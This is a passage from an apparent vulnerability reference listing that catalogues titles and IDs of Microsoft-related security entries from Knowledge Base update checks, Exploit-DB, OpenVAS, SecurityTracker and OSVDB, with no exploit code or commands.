Article 2639142 update is not installed [71554] Microsoft Windows Knowledge Base Article 2633171 update is not installed [71552] Microsoft Windows Knowledge Base Article 2624667 update is not installed [71550] Microsoft Windows Knowledge Base Article 2620712 update is not installed [71548] Microsoft Windows Knowledge Base Article 2618451 update is not installed [71546] Microsoft Windows Knowledge Base Article 2618444 update is not installed [71538] Microsoft Windows Knowledge Base Article 2590602 update is not installed [70951] Microsoft Windows Knowledge Base Article 2630837 update is not installed [70949] Microsoft Windows Knowledge Base Article 2620704 update is not installed [70947] Microsoft Windows Knowledge Base Article 2617657 update is not installed [70943] Microsoft Windows Knowledge Base Article 2588516 update is not installed [70152] Microsoft Windows Knowledge Base Article 2623699 update is not installed [70140] Microsoft Windows Knowledge Base Article 2652016 update is not installed [70130] Microsoft Windows Knowledge Base Article 2586448 update is not installed [70115] Microsoft Windows Knowledge Base Article 2567053 update is not installed [69501] Microsoft Windows Knowledge Base Article 2587634 update is not installed [69498] Microsoft Windows Knowledge Base Article 2587505 update is not installed [69492] Microsoft Windows Knowledge Base Article 2571621 update is not installed [69490] Microsoft Windows Knowledge Base Article 2570947 update is not installed [68840] Microsoft Windows Knowledge Base Article 2451858 update is not installed [68833] Microsoft Windows Knowledge Base Article 2567943 update is not installed [68831] Microsoft Windows Knowledge Base Article 2570222 update is not installed [68829] Microsoft Windows Knowledge Base Article 2567951 update is not installed [68827] Microsoft Windows Knowledge Base Article 2578230 update is not installed [68825] Microsoft Windows Knowledge Base Article 2546250 update is not installed [68823] Microsoft Windows Knowledge Base Article 2559049 update is not installed [68816] Microsoft Windows Knowledge Base Article 2556532 update is not installed [68814] Microsoft Windows Knowledge Base Article 2560656 update is not installed [68812] Microsoft Windows Knowledge Base Article 2560978 update is not installed [68809] Microsoft Windows Knowledge Base Article 2562485 update is not installed [68806] Microsoft Windows Knowledge Base Article 2566454 update is not installed [68804] Microsoft Windows Knowledge Base Article 2563894 update is not installed [68801] Microsoft Windows Knowledge Base Article 2567680 update is not installed [68315] Microsoft Windows Knowledge Base Article 2555917 update is not installed [68299] Microsoft Windows Knowledge Base Article 2566220 update is not installed [68283] Microsoft Windows Knowledge Base Article 2560847 update is not installed [67955] Microsoft Windows Knowledge Base Article 2530548 update is not installed [67943] Microsoft Windows Knowledge Base Article 2544521 update is not installed [67762] Microsoft Windows Knowledge Base Article 2543893 update is not installed [67759] Microsoft Windows Knowledge Base Article 2544893 update is not installed [67757] Microsoft Windows Knowledge Base Article 2476490 update is not installed [67753] Microsoft Windows Knowledge Base Article 2514842 update is not installed [67751] Microsoft Windows Knowledge Base Article 2518295 update is not installed [67737] Microsoft Windows Knowledge Base Article 2520426 update is not installed [67733] Microsoft Windows Knowledge Base Article 2525694 update is not installed [67731] Microsoft Windows Knowledge Base Article 2525835 update is not installed [67728] Microsoft Windows Knowledge Base Article 2535512 update is not installed [67725] Microsoft Windows Knowledge Base Article 2536275 update is not installed [67722] Microsoft Windows Knowledge Base Article 2536276 update is not installed [67718] Microsoft Windows Knowledge Base Article 2537146 update is not installed [67709] Microsoft Windows Knowledge Base Article 2538814 update is not installed [67302] Microsoft Windows Knowledge Base Article 2545814 update is not installed [67101] Microsoft Windows Knowledge Base Article 2524426 update is not installed [66446] Microsoft Windows Knowledge Base Article 2514666 update is not installed [66444] Microsoft Windows Knowledge Base Article 2511455 update is not installed [66436] Microsoft Windows Knowledge Base Article 2497640 update is not installed [66432] Microsoft Windows Knowledge Base Article 2527308 update is not installed [66428] Microsoft Windows Knowledge Base Article 2489979 update is not installed [66423] Microsoft Windows kernel-mode driver (win32k.sys) variant 29 privilege escalation [66422] Microsoft Windows kernel-mode driver (win32k.sys) variant 28 privilege escalation [66421] Microsoft Windows kernel-mode driver (win32k.sys) variant 27 privilege escalation [66420] Microsoft Windows kernel-mode driver (win32k.sys) variant 26 privilege escalation [66419] Microsoft Windows kernel-mode driver (win32k.sys) variant 25 privilege escalation [66418] Microsoft Windows kernel-mode driver (win32k.sys) variant 24 privilege escalation [66417] Microsoft Windows kernel-mode driver (win32k.sys) variant 23 privilege escalation [66416] Microsoft Windows kernel-mode driver (win32k.sys) variant 22 privilege escalation [66415] Microsoft Windows kernel-mode driver (win32k.sys) variant 21 privilege escalation [66414] Microsoft Windows kernel-mode driver (win32k.sys) variant 20 privilege escalation [66396] Microsoft Windows kernel-mode driver (win32k.sys) variant 2 privilege escalation [66394] Microsoft Windows Knowledge Base Article 2485663 update is not installed [65588] Microsoft Windows Knowledge Base Article 2489279 update is not installed [65581] Microsoft Windows Knowledge Base Article 2510030 update is not installed [65580] Microsoft Windows Knowledge Base Article 2489283 update is not installed [65575] Microsoft Windows Knowledge Base Article 2489293 update is not installed [65573] Microsoft Windows Knowledge Base Article 2494047 update is not installed [64973] Microsoft Windows Knowledge Base Article 2478960 update is not installed [64971] Microsoft Windows Knowledge Base Article 2479628 update is not installed [64927] Microsoft Windows Knowledge Base Article 2393802 update is not installed [64925] Microsoft Windows Knowledge Base Article 2451879 update is not installed [64920] Microsoft Windows Knowledge Base Article 2475792 update is not installed [64918] Microsoft Windows Knowledge Base Article 2476687 update is not installed [64916] Microsoft Windows Knowledge Base Article 2478953 update is not installed [64914] Microsoft Windows Knowledge Base Article 2482017 update is not installed [64910] Microsoft Windows Knowledge Base Article 2483185 update is not installed [64909] Microsoft Windows Knowledge Base Article 2484015 update is not installed [64907] Microsoft Windows Knowledge Base Article 2485376 update is not installed [64905] Microsoft Windows Knowledge Base Article 2489256 update is not installed [64902] Microsoft Windows Knowledge Base Article 2496930 update is not installed [64342] Microsoft Windows Knowledge Base Article 2451910 update is not installed [64339] Microsoft Windows Knowledge Base Article 2478935 update is not installed [63584] Microsoft Windows Knowledge Base Article 2424434 update is not installed [63582] Microsoft Windows Knowledge Base Article 2423089 update is not installed [63580] Microsoft Windows Knowledge Base Article 2436673 update is not installed [63571] Microsoft Windows Knowledge Base Article 2440591 update is not installed [63569] Microsoft Windows Knowledge Base Article 2385678 update is not installed [63566] Microsoft Windows Knowledge Base Article 2442962 update is not installed [63564] Microsoft Windows Knowledge Base Article 2345316 update is not installed [63562] Microsoft Windows Knowledge Base Article 2296199 update is not installed [63558] Microsoft Windows Knowledge Base Article 2416400 update is not installed [63550] Microsoft Windows Knowledge Base Article 2447961 update is not installed [63548] Microsoft Windows Knowledge Base Article 2443105 update is not installed [63546] Microsoft Windows Knowledge Base Article 2455005 update is not installed [63544] Microsoft Windows Knowledge Base Article 2292970 update is not installed [62805] Microsoft Windows Knowledge Base Article 2316074 update is not installed [62793] Microsoft Windows Knowledge Base Article 2293386 update is not installed [62789] Microsoft Windows Knowledge Base Article 2423930 update is not installed [62170] Microsoft Windows Knowledge Base Article 2296011 update is not installed [62166] Microsoft Windows Knowledge Base Article 2294255 update is not installed [62163] Microsoft Windows Knowledge Base Article 2281679 update is not installed [62154] Microsoft Windows Knowledge Base Article 2279986 update is not installed [62147] Microsoft Windows Knowledge Base Article 2160841 update is not installed [62134] Microsoft Windows Knowledge Base Article 2412048 update is not installed [62129] Microsoft Windows Knowledge Base Article 2387149 update is not installed [62126] Microsoft Windows Knowledge Base Article 2378111 update is not installed [62123] Microsoft Windows Knowledge Base Article 2360937 update is not installed [62118] Microsoft Windows Knowledge Base Article 2293211 update is not installed [62104] Microsoft Windows Knowledge Base Article 2360131 update is not installed [62098] Microsoft Windows Knowledge Base Article 2293194 update is not installed [62069] Microsoft Windows Knowledge Base Article 2418042 update is not installed [61519] Microsoft Windows Knowledge Base Article 2121546 update is not installed [61517] Microsoft Windows Knowledge Base Article 2259922 update is not installed [61514] Microsoft Windows Knowledge Base Article 2267960 update is not installed [61510] Microsoft Windows Knowledge Base Article 2315011 update is not installed [61507] Microsoft Windows Knowledge Base Article 2320113 update is not installed [61504] Microsoft Windows Knowledge Base Article 2347290 update is not installed [60736] Microsoft Windows Knowledge Base Article 2265906 update is not installed [60734] Microsoft Windows Knowledge Base Article 2269638 update is not installed [60728] Microsoft Windows Knowledge Base Article 2269707 update is not installed [60724] Microsoft Windows Knowledge Base Article 2286198 update is not installed [60713] Microsoft Windows Knowledge Base Article 2183461 update is not installed [60698] Microsoft Windows Knowledge Base Article 2160329 update is not installed [60686] Microsoft Windows Knowledge Base Article 2115168 update is not installed [60684] Microsoft Windows Knowledge Base Article 2079403 update is not installed [60680] Microsoft Windows Knowledge Base Article 2264072 update is not installed [59901] Microsoft Windows Knowledge Base Article 2229593 update is not installed [59898] Microsoft Windows Knowledge Base Article 2229593 update is not installed [58913] Microsoft Windows Knowledge Base Article 2027452 update is not installed [58891] Microsoft Windows Knowledge Base Article 2028554 update is not installed [17004] Microsoft Windows XP Service Pack 2 is not installed on the system [9187] Microsoft Passport SDK 2.1 Component Configuration Document (CCD) permission [9146] Microsoft Passport SDK 2.1 events reporting disabled [9068] Microsoft Passport SDK 2.1 registry default permission exposure [9067] Microsoft Passport SDK 2.1 default test site exposure [9066] Microsoft Passport SDK 2.1 Adventure Works Sample Site exposure [9065] Microsoft Passport SDK 2.1 Adventure Works Sample Site global.asa file default permission exposure [9064] Microsoft Passport SDK 2.1 default time window exposure [1271] Microsoft IIS version 2 installed [621] Microsoft IIS 3.0 script source revealed by appending 2E to requests Exploit-DB - https://www.exploit-db.com: [30756] Microsoft Forms 2.0 ActiveX Control 2.0 Memory Access Violation Denial of Service Vulnerabilities [30749] Microsoft Office 2003 Web Component Memory Access Violation Denial of Service Vulnerability [30636] Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (2) [30635] Microsoft Windows 2000/2003 Recursive DNS Spoofing Vulnerability (1) [30281] Microsoft .Net Framework <= 2.0 - Multiple Null Byte Injection Vulnerabilities [29664] Microsoft Office Publisher 2007 - Remote Denial of Service (DoS) Vulnerability [29660] Microsoft Office 2003 - Denial of Service (DoS) Vulnerability [29630] Microsoft Windows 2003/XP ReadDirectoryChangesW Information Disclosure Vulnerability [29524] Microsoft Word 2000 - Malformed Function Code Execution Vulnerability [28420] Microsoft Windows 2000 Multiple COM Object Instantiation Code Execution Vulnerabilities [28357] Microsoft Windows Explorer 2000/2003/XP Drag and Drop Remote Code Execution Vulnerability [28227] Microsoft Windows 2000/XP Registry Access Local Denial of Service Vulnerability [28226] Microsoft PowerPoint 2003 PPT File Closure Memory Corruption [28225] Microsoft PowerPoint 2003 powerpnt.exe Unspecified Issue [28224] Microsoft PowerPoint 2003 mso.dll PPT Processing Unspecified Code Execution [28198] Microsoft Office 2000/2002 Property Code Execution Vulnerability [28189] Microsoft Excel 2000-2004 Style Handling and Repair Remote Code Execution Vulnerability [28087] Microsoft Office 2003 Embedded Shockwave Flash Object Security Bypass Weakness [28005] Microsoft Exchange Server 2000/2003 Outlook Web Access Script Injection Vulnerability [26690] Microsoft Windows 2000/2003/XP CreateRemoteThread Local Denial of Service Vulnerability [26517] Microsoft Office PowerPoint 2007 - Crash PoC [26341] Microsoft Windows 2000/2003/XP MSDTC TIP Denial of Service Vulnerability [26222] Microsoft Windows 2000/2003/XP Keyboard Event Privilege Escalation Weakness [25384] Microsoft Windows 2000/XP Internet Protocol Validation Remote Code Execution Vulnerability (2) [25383] Microsoft Windows 2000/XP Internet Protocol Validation Remote Code Execution Vulnerability (1) [25231] Microsoft Windows 2000/2003/XP Graphical Device Interface Library Denial of Service Vulnerability [25085] Microsoft Office XP 2000/2002 HTML Link Processing Remote Buffer Overflow Vulnerability [25084] Microsoft Outlook 2003 Web Access Login Form Remote URI Redirection Vulnerability [25050] Microsoft Windows 2000/2003/XP winhlp32 Phrase Heap Overflow Vulnerability [25049] Microsoft Windows 2000/2003/XP winhlp32 Phrase Integer Overflow Vulnerability [24686] Microsoft Outlook 2003 Security Policy Bypass Vulnerability [24277] Microsoft Windows 2000/NT 4 POSIX Subsystem Buffer Overflow Local Privilege Escalation Vulnerability [24114] Microsoft Outlook 2003Mail Client E-mail Address Verification Weakness [24101] Microsoft Outlook 2003 Predictable File Location Weakness [23989] Microsoft Windows 2000/NT 4 Local Descriptor Table Local Privilege Escalation Vulnerability [23796] Microsoft Outlook 2002 Mailto Parameter Quoting Zone Bypass Vulnerability [23019] Microsoft Windows 2000 Subnet Bandwidth Manager RSVP Server Authority Hijacking Vulnerability [22919] Microsoft ISA Server 2000 Cross-Site Scripting Vulnerabilities [22883] Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (2) [22882] Microsoft Windows 2000 CreateFile API Named Pipe Privilege Escalation Vulnerability (1) [22837] Microsoft Windows 2000/NT 4 Media Services NSIISlog.DLL Remote Buffer Overflow [22782] Microsoft Windows 2000 Active Directory Remote Stack Overflow Vulnerability [22591] Microsoft Office Excel 2007 - WriteAV Crash PoC [22555] Microsoft BizTalk Server 2000/2002 DTA RawCustomSearchField.asp SQL Injection [22554] Microsoft BizTalk Server 2000/2002 DTA rawdocdata.asp SQL Injection Vulnerability [22553] Microsoft BizTalk Server 2002 HTTP Receiver Buffer Overflow Vulnerability [22528] Microsoft Windows 2000 RegEdit.EXE Registry Key Value Buffer Overflow Vulnerability [22354] Microsoft Windows 2000 Help Facility .CNT File :Link Buffer Overflow Vulnerability [21920] Microsoft Content Management Server 2001 Cross-Site Scripting Vulnerability [21718] Microsoft SQL 2000/7.0 Agent Jobs Privilege Elevation Vulnerability [21693] Microsoft SQL Server 2000 User Authentication Remote Buffer Overflow Vulnerability [21652] Microsoft SQL Server 2000 Resolution Service Heap Overflow Vulnerability [21651] Microsoft SQL Server 2000 sp_MScopyscript SQL Injection Vulnerability [21650] Microsoft SQL Server 2000 Database Consistency Checkers Buffer Overflow Vulnerability [21549] Microsoft SQL Server 2000 Password Encrypt Procedure Buffer Overflow Vulnerability [21541] Microsoft SQL Server 2000 SQLXML Script Injection Vulnerability [21540] Microsoft SQL Server 2000 SQLXML Buffer Overflow Vulnerability [21389] Microsoft Windows 2000 Lanman Denial of Service Vulnerability (2) [21388] Microsoft Windows 2000 Lanman Denial of Service Vulnerability (1) [21344] Microsoft Windows 2000 / NT 4.0 Process Handle Local Privilege Elevation Vulnerability [21258] Microsoft Windows 2000/NT 4 NTFS File Hiding Vulnerability [21246] Microsoft Windows 2000/NT 4 TCP Stack DoS Vulnerability (2) [21245] Microsoft Windows 2000/NT 4 TCP Stack DoS Vulnerability (1) [21172] Microsoft Windows 2000 Internet Key Exchange DoS Vulnerability (2) [21171] Microsoft Windows 2000 Internet Key Exchange DoS Vulnerability (1) [21131] Microsoft Windows 2000/XP GDI Denial of Service Vulnerability [21123] Microsoft Windows 2000/NT Terminal Server Service RDP DoS Vulnerability [21113] Microsoft Index Server 2.0 File Information and Path Disclosure Vulnerability [21099] Microsoft Windows 2000 RunAs Service Denial of Services Vulnerability [21069] Microsoft Windows 2000 RunAs Service Named Pipe Hijacking Vulnerability [20907] Microsoft Windows 2000 Telnet Username DoS Vulnerability [20802] Microsoft IIS 2.0/3.0 Long URL Denial of Service Vulnerability [20763] Microsoft ISA Server 2000 Web Proxy DoS Vulnerability [20571] Microsoft Outlook 2000 0/98 0/Express 5.5 Concealed Attachment Vulnerability [20481] Microsoft IIS 2.0/3.0 Appended Dot Script Source Disclosure Vulnerability [20399] Microsoft Indexing Services for Windows 2000 File Verification Vulnerability [20335] Microsoft Indexing Services for Windows 2000/NT 4.0 .htw Cross-Site Scripting Vulnerability [20305] Microsoft Site Server 2.0 with IIS 4.0 - File Upload Vulnerability [20265] Microsoft Windows NT 4.0 / 2000 Spoofed LPC Request Vulnerability [20257] Microsoft Windows NT 4.0 / 2000 Predictable LPC Message Identifier Multiple Vulnerabilities [20255] Microsoft Windows NT 4.0 / 2000 LPC Zone Memory Depletion DoS Vulnerability [20222] Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability [20209] Microsoft Windows 2000 Still Image Service Privilege Escalation Vulnerability [20133] Microsoft Windows 2000 Named Pipes Predictability Vulnerability [20122] Microsoft Office SharePoint Server 2007 Remote Code Execution [20096] Microsoft IIS 2.0/3.0/4.0/5.0/5.1 Internal IP Address Disclosure Vulnerability [20048] Microsoft Windows 2000 Remote CPU-overload Vulnerability [20047] Microsoft Windows 2000 Telnet Server DoS Vulnerability [19830] Microsoft Index Server 2.0 '%20' ASP Source Disclosure Vulnerability [19742] microsoft iis 3.0/4.0,microsoft index server 2.0 - Directory Traversal [19734] Microsoft Virtual Machine 2000 Series/3000 Series getSystemResource Vulnerability [19731] microsoft index server 2.0/indexing services for windows 2000 - Directory Traversal [19728] Microsoft Systems Management Server 2.0 Default Permissions Vulnerability [19425] Microsoft Data Access Components (MDAC) <= 2.1,Microsoft IIS 3.0/4.0,Microsoft Index Server 2.0,Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (2) [19424] Microsoft Data Access Components (MDAC) <= 2.1,Microsoft IIS 3.0/4.0,Microsoft Index Server 2.0,Microsoft Site Server Commerce Edition 3.0 i386 MDAC RDS Vulnerability (1) [19376] Microsoft IIS 2.0/3.0/4.0 ISAPI GetExtensionVersion() Vulnerability [19143] "Microsoft Windows ""April Fools 2001"" Vulnerability" [19118] Microsoft IIS 3.0/4.0,Microsoft Personal Web Server 2.0/3.0/4.0 ASP Alternate Data Streams Vulnerability [18334] Microsoft Office 2003 Home/Pro 0day [18087] MS11-021 Microsoft Office 2007 Excel .xlb Buffer Overflow [18078] Microsoft Excel 2003 11.8335.8333 Use After Free [18067] Microsoft Excel 2007 SP2 Buffer Overwrite Exploit [17305] "Microsoft Windows Vista/Server 2008 ""nsiproxy.sys"" Local Kernel DoS Exploit" [14971] MOAUB #11 - Microsoft Office Word 2007 sprmCMajority Buffer Overflow [14782] Microsoft Office PowerPoint 2007 DLL Hijacking Exploit (rpawinet.dll) [14746] Microsoft Office Groove 2007 DLL Hijacking Exploit (mso.dll) [14744] Microsoft Visio 2003 DLL Hijacking Exploit (mfc71enu.dll) [12450] Microsoft SharePoint Server 2007 XSS Vulnerability [10068] Microsoft Windows 2000-2008 Embedded OpenType Font Engine Remote Code Execution [4121] Microsoft Excel 2000/2003 Sheet Name Vulnerability PoC [3973] Microsoft Office 2000 (OUACTRL.OCX 1.0.1.9) - Remote DoS Exploit [3690] microsoft office word 2007 - Multiple Vulnerabilities [3260] Microsoft Word 2000 Unspecified Code Execution Exploit (0day) [2523] Microsoft Office 2003 PPT Local Buffer Overflow PoC [2091] Microsoft PowerPoint 2003 SP2 Local Code Execution Exploit (french) [2001] Microsoft Word 2000/2003 Unchecked Boundary Condition Vulnerability [1999] Microsoft Word 2000/2003 Hlink Local Buffer Overflow Exploit PoC [1988] Microsoft Excel 2003 Hlink Local Buffer Overflow Exploit (italian) [1986] Microsoft Excel 2000/2003 Hlink Local Buffer Overflow Exploit (french) [1958] Microsoft Excel 2003 Hlink Stack/SEH Buffer Overflow Exploit [28238] Microsoft SharePoint 2013 (Cloud) - Persistent Exception Handling Vulnerability MS13-067 [23034] Microsoft URLScan 2.5/ RSA Security SecurID 5.0 Configuration Enumeration Weakness [22850] Microsoft Office OneNote 2010 Crash PoC [22679] Microsoft Visio 2010 Crash PoC [22655] Microsoft Publisher 2013 Crash PoC [22621] Microsoft Netmeeting 2.1/3.0.1 4.4.3385 CALLTO URL Buffer Overflow Vulnerability [22330] Microsoft Office Excel 2010 Crash PoC [22310] Microsoft Office Publisher 2010 Crash PoC [22237] Microsoft Office Picture Manager 2010 Crash PoC [22215] Microsoft Office Word 2010 Crash PoC [19451] Microsoft Windows 98 a/98 b/98SE,Solaris 2.6 IRDP Vulnerability [19440] Microsoft Windows NT 4.0/SP 1/SP 2/Sp 3/SP 4/SP 5 Malformed Dialer Entry Vulnerability [19372] Microsoft Windows NT 4.0/SP 1/SP 2/SP 3/SP 4/SP 5 Null Session Admin Name Vulnerability [17164] Microsoft Reader <= 2.1.1.3143 NULL Byte Write [17163] Microsoft Reader <= 2.1.1.3143 Array Overflow [17162] Microsoft Reader <= 2.1.1.3143 Integer Overflow [17161] Microsoft Reader <= 2.1.1.3143 Heap Overflow [17160] Microsoft Reader <= 2.1.1.3143 Integer Overflow [14731] Microsoft Windows Movie Maker <= 2.6.4038.0 DLL Hijacking Exploit (hhctrl.ocx) [14723] Microsoft Power Point 2010 DLL Hijacking Exploit (pptimpconv.dll) OpenVAS (Nessus) - http://www.openvas.org: [902250] Microsoft Word 2003 'MSO.dll' Null Pointer Dereference Vulnerability [900125] Microsoft SQL Server 2000 sqlvdir.dll ActiveX Buffer Overflow Vulnerability [801597] Microsoft Office Excel 2003 Invalid Object Type Remote Code Execution Vulnerability [801596] Microsoft Excel 2007 Office Drawing Layer Remote Code Execution Vulnerability [801594] Microsoft PowerPoint 2007 OfficeArt Atom Remote Code Execution Vulnerability [800687] Microsoft Windows Server 2003 OpenType Font Engine DoS Vulnerability [800577] Microsoft Windows Server 2003 win32k.sys DoS Vulnerability [800343] Microsoft Word 2007 Sensitive Information Disclosure Vulnerability [103254] Microsoft SharePoint Server 2007 '_layouts/help.aspx' Cross Site Scripting Vulnerability [11992] Vulnerability in Microsoft ISA Server 2000 H.323 Filter(816458) [902931] Microsoft Office Remote Code Execution Vulnerabilities - 2720184 (Mac OS X) [902678] Microsoft Silverlight Code Execution Vulnerabilities - 2681578 (Mac OS X) [901210] Microsoft Office Privilege Elevation Vulnerability - 2721015 (Mac OS X) SecurityTracker - https://www.securitytracker.com: [1015347] Microsoft Windows 2000 Kernel APC Queue Bug Lets Local Users Gain Elevated Privileges [1013454] Microsoft Office InfoPath 2003 May Disclose System and Authentication Information to Remote Users [1013284] Microsoft Windows 2000 and XP Group Policy Can Be Bypassed By Microsoft Office Applications and By Flash Drives [1010687] Microsoft Windows 2000/NT POSIX Subsystem Buffer Overflow Lets Local Users Gain Elevated Privileges [1010352] Microsoft Windows 2000 Domains With Eight Characters May Let Remote Users With Expired Passwords Login [1010189] Microsoft Outlook 2003 Scripting Restrictions Can Be Bypassed By Remote Users [1010125] Microsoft Outlook 2003 Lets Remote Users Send E-mail to Cause the Recipient's Client to Contact a Remote Server [1009767] Microsoft Windows 2000 Domain Controller LDAP Flaw May Let Remote Users Restart the Authentication Service [1008324] Microsoft Exchange 2003 With Outlook Web Access and Windows SharePoint Services May Grant Incorrect E-mail Account Access to Remote Authenticated Users [1007905] Microsoft Windows Server 2003 Shell Folders Can Be Referenced Using Directory Traversal Characters [1007238] Microsoft Outlook Web Access Can Be Crashed By Remote Authenticated Users With an Outlook 2003 Client [1007152] Microsoft Windows 2000 Accessibility Utility Manager Lets Local Users Gain Elevated Privileges [1007099] Microsoft Windows 2000 ShellExecute() Buffer Overflow May Let Users Execute Arbitrary Code [1007093] Microsoft Active Directory Stack Overflow in 'Lsaas.exe' Lets Remote Users Crash the Windows 2000 Server [1006959] Microsoft Windows Server 2003 Drivers May Leak Information From Memory Via Ethernet Packets Containing TCP Streams [1006580] Microsoft Windows 2003 'win2k.sys' Printing Bug Lets Users Crash the System [1006534] Microsoft Proxy Service in Proxy Server 2.0 Has Unspecified Flaw That Lets Remote Users Stop Traffic [1006286] Microsoft Windows 2000/XP PostMessage() API Flaw May Let Local Users Grab Passwords from Local Dialog Boxes [1006280] Protegrity Secure.Data for Microsoft SQL Server 2000 Contains Buffer Oveflows That Let Remote Users Execute Arbitrary Code [1005254] Microsoft NT, 2000, and XP Operating Systems May Execute a 16-bit Application Even When The File Has No Execute Permissions [1005068] Microsoft NTFS Filesystem in Windows NT and Windows 2000 Has Auditing Hole That Lets Local Users Access Files Without the File Access Being Audited [1004587] Microsoft SQL Server 2000 Buffer Overflow in OpenDataSource() Function May Let Remote Users Gain SYSTEM Privileges on the Server [1004528] Microsoft SQLXML Component of Microsoft SQL Server 2000 Contains an Input Validation Flaw in an XML SQL Tag That Allows Cross-Site Scripting Attacks [1004527] Microsoft SQLXML Component of Microsoft SQL Server 2000 Contains a Buffer Overflow That Lets Remote Users Take Full Control of the System [1004407] Microsoft Exchange 2000 Flaw in Processing a Certain Malformed SMTP Command Allows Remote Users to Deny Service to the Server [1004357] Microsoft Windows Debugging Facility for Windows NT4 and 2000 Has Authentication Hole That Lets Local Users Execute Arbitrary Code with SYSTEM Privileges [1004083] Microsoft Windows 2000 'microsoft-ds' Service Flaw Allows Remote Users to Create Denial of Service Conditions By Sending Malformed Packets [1004022] Microsoft Windows 2000 Group Policy Object Enforcement Can Be Circumvented if User License Limits are Exceeded [1003975] Microsoft Windows NT, 2000, and XP Kernel Buffer Overflow in Processing Multiple UNC Provider (MUP) Requests May Let Local Users Obtain System Level Privileges [1003949] Microsoft Windows 2000 DCOM Implementation Flaw May Disclose Memory Contents to Remote Users [1003816] Microsoft Windows 2000 Automatic Log Off Policy Fails to Expire Sessions in Progress [1003688] Microsoft Exchange Server 2000 Command Processing Bug Lets Remote Users Cause the SMTP Service to Crash [1003687] Microsoft Windows 2000 and Windows XP SMTP Service Command Processing Bug Lets Remote Users Cause the SMTP Service to Crash [1003634] Microsoft XML Core Services in SQL Server 2000 Lets Remote Scripts Access and Send Local Files [1003629] Microsoft Commerce Server 2000 AuthFilter Buffer Overflow Lets Remote Users Execute Arbitrary Code on the Server With LocalSystem Privileges to Gain Full Control of the Server [1003472] Microsoft Telnet Server for Windows 2000 and for Interix Has a Buffer Overflow That May Let Remote Users Execute Code on the Server with System Level Privileges [1003469] Microsoft Exchange 2000 Server Allows Remote Users to View and Possibly Modify Registry Settings [1003402] Microsoft Windows NT 4.0 and Windows 2000 Domain Controllers May Give Elevated Privileges to Remote Users Who Are Valid Administrators on Other Trusted Domains [1002922] Microsoft Windows 2000 Internet Key Exchange (IKE) Service Can Be Crashed By Remote Users [1002754] Terminal Services on Microsoft Windows 2000 and XP Allow Remote Users to Log Bogus IP Addresses Instead of the User's Genuine Address [1002731] Microsoft Windows 2000 RunAs Service May Disclose Authentication Credentials to Local Users [1002730] Microsoft Windows 2000 RunAs Utility May Disclose Sensitive Information to Local Users [1002729] Microsoft Windows 2000 RunAs Service Allows Local Users to Disable the Service [1002356] Microsoft Outlook 2000 Animated Assistant Prevents the Screen Saver from Activating, Allowing Physically Local Users to Access the System [1002206] Microsoft Internet Security and Acceleration (ISA) Server 2000 Can Be Disrupted By Remote Users Due to Memory Leaks and Also Allows Cross-Site Scripting Attacks [1002106] Microsoft Windows 2000 and Windows NT 4.0 RPC Input Validation Failure Lets Remote Users Destabilize the Operating System [1002099] Microsoft Windows 2000 Telnet Service Can Be Crashed By Remote Users [1002098] Windows Terminal Services in Microsoft Windows 2000 and NT 4.0 Can Be Crashed By Remote Users Due to a Memory Leak [1001993] Microsoft Windows 2000, Linux 2.4, NetBSD, FreeBSD, and OpenBSD May Let Remote Users Affect TCP Performance [1001931] Microsoft Windows 2000 SMTP Service May Allow Unauthorized Remote Users to Relay E-mail via the Service [1001832] Microsoft Windows 2000 LDAP Server Lets Remote Users Gain Administrator Access to the Domain Controller When Configured to Support LDAP over SSL [1001701] Microsoft Windows 2000 Telnet Server Allows Local Users to Gain System-Level Privileges and Lets Remote Users Crash the Server [1001605] Microsoft Windows 2000 Allows Local Users to Elevate Privileges [1001565] Microsoft IIS Web Server on Windows 2000 Allows Remote Users to Cause the Server to Consume All Available Memory Due to Memory Leak in WebDAV Lock Method [1001513] Microsoft Windows 2000 Indexing Service Allows Remote Users to View Include Programming Files [1001501] Microsoft Windows 2000 Domain Controllers Can Be Effectively Halted By Remote Users [1001464] Microsoft Internet Information Server IIS 5.0 for Windows 2000 Lets Remote Users Execute Arbitrary Code on the Server and Gain Control of the Server [1001240] Microsoft FTP Client for Windows 2000 Still Vulnerable to Executing Arbitrary Code in Limited Situations [1001088] Microsoft Internet Explorer with Services for Unix 2.0 Can Create Malicious Files on the User's Host OSVDB - http://www.osvdb.org: [90257] Microsoft Windows Server 2003 ICACLS.EXE Permission Inheritance Weakness [86790] Microsoft Virtual PC 2007 Crafted x86 Instruction Sequence Handling Local DoS [86061] Microsoft Windows Server 2008 R1 CSRSS ReadConsole / CloseHandle Local DoS [79442] Microsoft Windows Server 2008 DNS Server Service Cache Update Policy Deleted Domain Name Resolving Weakness [72670] Microsoft Windows Server 2003 ActiveDirectory BROWSER ELECTION Remote Overflow [68554] Microsoft Windows Server 2008 Shared Cluster Disks Addition Default Permission Weakness [62251] Microsoft Windows Server 2008 Hyper-V Crafted Instruction Sequence DoS [60329] Microsoft Windows 2000 NetBIOS Continuation Packet Remote DoS [59733] Microsoft Windows 2000 Terminal Services Screensaver Screen Minimization Locking Weakness [59731] Microsoft Windows 2000 DCOM Client Alter Context Request Remote Information Disclosure [59730] Microsoft Windows 2000 Terminal Services Disconnect Feature Local Privilege Escalation [59514] Microsoft Windows 2000 Task Manager Uppercase Process Name Termination Weakness [59509] Microsoft Windows 2000 Encrypted File System Cleartext Backup File Local Disclosure [59346] Microsoft Windows 2000 Crafted TCP/UDP Traffic CPU Consumption Remote DoS [55836] Microsoft ISA Server 2006 Radius OTP Security Bypass [53663] Microsoft Office Word 2000 WordPerfect 6.x Converter Document Handling Stack Corruption [50589] Microsoft SQL Server 2000 sp_replwritetovarbin() Stored Procedure Overflow [37629] Microsoft Windows 2000 RPC Authentication Unspecified Information Disclosure [37628] Microsoft Windows 2000 RPC Authentication Crafted Request Remote DoS [36034] Microsoft Office 2000 Controllo ActiveX (OUACTRL.OCX) HelpPopup Method Overflow [34489] Microsoft Office 2003 Malformed WMF File Handling DoS [34488] Microsoft Excel 2003 XLS Handling Corrupt Format DoS [31251] Microsoft Office 2003 Brazilian Portuguese Grammar Checker Arbitrary Code Execution [29529] Microsoft Windows 2000 creator.dll ActiveX COM Object Memory Corruption [29528] Microsoft Windows 2000 msdxm.ocx ActiveX COM Object Memory Corruption [29527] Microsoft Windows 2000 myinfo.dll ActiveX COM Object Memory Corruption [29526] Microsoft Windows 2000 ciodm.dll 